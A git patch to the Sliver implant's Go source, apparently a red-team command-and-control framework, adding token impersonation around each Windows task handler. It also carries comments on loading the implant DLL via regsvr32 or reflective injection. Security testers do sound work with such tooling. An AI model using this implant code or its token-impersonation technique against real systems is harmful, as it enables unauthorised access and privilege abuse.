From 5e6148b193e2073b51d3851e74ee997abaccdcee Mon Sep 17 00:00:00 2001 From: MrAle98 Date: Wed, 9 Nov 2022 14:41:22 +0100 Subject: [PATCH] improved token management --- implant/sliver/handlers/handlers_windows.go | 24 +++++++++ implant/sliver/priv/priv_windows.go | 16 ++++++ implant/sliver/sliver.go | 57 ++++++++++++++------- 3 files changed, 79 insertions(+), 18 deletions(-) diff --git a/implant/sliver/handlers/handlers_windows.go b/implant/sliver/handlers/handlers_windows.go index 1892f7d30d..3b6c4f818f 100644 --- a/implant/sliver/handlers/handlers_windows.go +++ b/implant/sliver/handlers/handlers_windows.go @@ -24,6 +24,7 @@ import ( "fmt" "io" "os" + "runtime" // {{if .Config.Debug}} "log" @@ -37,6 +38,7 @@ import ( "github.com/bishopfox/sliver/implant/sliver/registry" "github.com/bishopfox/sliver/implant/sliver/service" "github.com/bishopfox/sliver/implant/sliver/spoof" + "github.com/bishopfox/sliver/implant/sliver/syscalls" "github.com/bishopfox/sliver/implant/sliver/taskrunner" "github.com/bishopfox/sliver/protobuf/commonpb" "github.com/bishopfox/sliver/protobuf/sliverpb" @@ -120,6 +122,28 @@ func GetSystemHandlers() map[uint32]RPCHandler { return windowsHandlers } +func WrapperHandler(handler RPCHandler, data []byte, resp RPCResponse) { + if priv.CurrentToken != 0 { + err := syscalls.ImpersonateLoggedOnUser(priv.CurrentToken) + if err != nil { + // {{if .Config.Debug}} + log.Printf("Error: %v\n", err) + // {{end}} + } + runtime.LockOSThread() + defer runtime.UnlockOSThread() + } + handler(data, resp) + if priv.CurrentToken != 0 { + err := priv.TRevertToSelf() + if err != nil { + // {{if .Config.Debug}} + log.Printf("Error: %v\n", err) + // {{end}} + } + } +} + // ---------------- Windows Handlers ---------------- func impersonateHandler(data []byte, resp RPCResponse) { diff --git a/implant/sliver/priv/priv_windows.go b/implant/sliver/priv/priv_windows.go index bd13aafcbf..c9ebfdb6a6 100644 --- a/implant/sliver/priv/priv_windows.go +++ b/implant/sliver/priv/priv_windows.go @@ -96,7 +96,23 @@ func SePrivEnable(s string) error { } func RevertToSelf() error { + err := windows.RevertToSelf() + if err != nil { + // {{if .Config.Debug}} + log.Printf("RevertToSelf Error: %v\n", err) + // {{end}} + } + err = windows.CloseHandle(windows.Handle(CurrentToken)) + if err != nil { + // {{if .Config.Debug}} + log.Printf("CloseHandle Error: %v\n", err) + // {{end}} + } CurrentToken = windows.Token(0) + return err +} + +func TRevertToSelf() error { return windows.RevertToSelf() } diff --git a/implant/sliver/sliver.go b/implant/sliver/sliver.go index 530f277613..fc3b720a9b 100644 --- a/implant/sliver/sliver.go +++ b/implant/sliver/sliver.go @@ -42,17 +42,11 @@ import ( "io/ioutil" // {{end}} - // {{if eq .Config.GOOS "windows"}} - "github.com/bishopfox/sliver/implant/sliver/priv" - "github.com/bishopfox/sliver/implant/sliver/syscalls" - - // {{end}} - consts "github.com/bishopfox/sliver/implant/sliver/constants" "github.com/bishopfox/sliver/implant/sliver/handlers" "github.com/bishopfox/sliver/implant/sliver/hostuuid" - "github.com/bishopfox/sliver/implant/sliver/locale" "github.com/bishopfox/sliver/implant/sliver/limits" + "github.com/bishopfox/sliver/implant/sliver/locale" "github.com/bishopfox/sliver/implant/sliver/pivots" "github.com/bishopfox/sliver/implant/sliver/transports" "github.com/bishopfox/sliver/implant/sliver/version" @@ -127,6 +121,7 @@ func (serv *sliverService) Execute(args []string, r <-chan svc.ChangeRequest, ch var isRunning bool = false // StartW - Export for shared lib build +// //export StartW func StartW() { if !isRunning { @@ -139,21 +134,25 @@ func StartW() { ///~https://github.com/Ne0nd0g/merlin/blob/master/cmd/merlinagentdll/main.go#L65 // VoidFunc is an exported function used with PowerSploit's Invoke-ReflectivePEInjection.ps1 +// //export VoidFunc func VoidFunc() { main() } // DllInstall is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s /n /i sliver.dll) // https://msdn.microsoft.com/en-us/library/windows/desktop/bb759846(v=vs.85).aspx +// //export DllInstall func DllInstall() { main() } // DllRegisterServer - is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s sliver.dll) // https://msdn.microsoft.com/en-us/library/windows/desktop/ms682162(v=vs.85).aspx +// //export DllRegisterServer func DllRegisterServer() { main() } // DllUnregisterServer - is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s /u sliver.dll) // https://msdn.microsoft.com/en-us/library/windows/desktop/ms691457(v=vs.85).aspx +// //export DllUnregisterServer func DllUnregisterServer() { main() } @@ -409,6 +408,23 @@ func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error { wg.Add(1) data := task.Data taskID := task.ID + // {{if eq .Config.GOOS "windows" }} + go handlers.WrapperHandler(handler, data, func(data []byte, err error) { + resultsMutex.Lock() + defer resultsMutex.Unlock() + defer wg.Done() + // {{if .Config.Debug}} + if err != nil { + log.Printf("[beacon] handler function returned an error: %s", err) + } + log.Printf("[beacon] task completed (id: %d)", taskID) + // {{end}} + results = append(results, &sliverpb.Envelope{ + ID: taskID, + Data: data, + }) + }) + // {{else}} go handler(data, func(data []byte, err error) { resultsMutex.Lock() defer resultsMutex.Unlock() @@ -424,6 +440,7 @@ func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error { Data: data, }) }) + // {{end}} } else if task.Type == sliverpb.MsgOpenSession { go openSessionHandler(task.Data) resultsMutex.Lock() @@ -566,20 +583,23 @@ func sessionMainLoop(connection *transports.Connection) error { // only applies the token to the calling thread, we need to call it before every task. // It's fucking gross to do that here, but I could not come with a better solution. - // {{if eq .Config.GOOS "windows" }} - if priv.CurrentToken != 0 { - err := syscalls.ImpersonateLoggedOnUser(priv.CurrentToken) - if err != nil { - // {{if .Config.Debug}} - log.Printf("Error: %v\n", err) - // {{end}} - } - } - // {{end}} - // {{if .Config.Debug}} log.Printf("[recv] sysHandler %d", envelope.Type) // {{end}} + + // {{if eq .Config.GOOS "windows" }} + go handlers.WrapperHandler(handler, envelope.Data, func(data []byte, err error) { + // {{if .Config.Debug}} + if err != nil { + log.Printf("[session] handler function returned an error: %s", err) + } + // {{end}} + connection.Send <- &sliverpb.Envelope{ + ID: envelope.ID, + Data: data, + } + }) + // {{else}} go handler(envelope.Data, func(data []byte, err error) { // {{if .Config.Debug}} if err != nil { @@ -591,6 +611,7 @@ func sessionMainLoop(connection *transports.Connection) error { Data: data, } }) + // {{end}} } else if handler, ok := tunHandlers[envelope.Type]; ok { // {{if .Config.Debug}} log.Printf("[recv] tunHandler %d", envelope.Type)